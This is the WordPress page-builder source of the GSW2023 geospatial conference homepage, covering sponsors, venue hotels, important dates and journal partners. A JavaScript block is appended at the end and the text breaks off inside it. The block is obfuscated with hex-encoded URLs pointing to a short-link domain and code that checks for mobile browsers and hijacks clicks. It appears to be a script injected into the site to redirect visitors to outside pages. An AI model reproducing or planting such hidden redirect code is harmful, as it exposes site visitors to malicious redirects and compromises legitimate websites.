!important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const 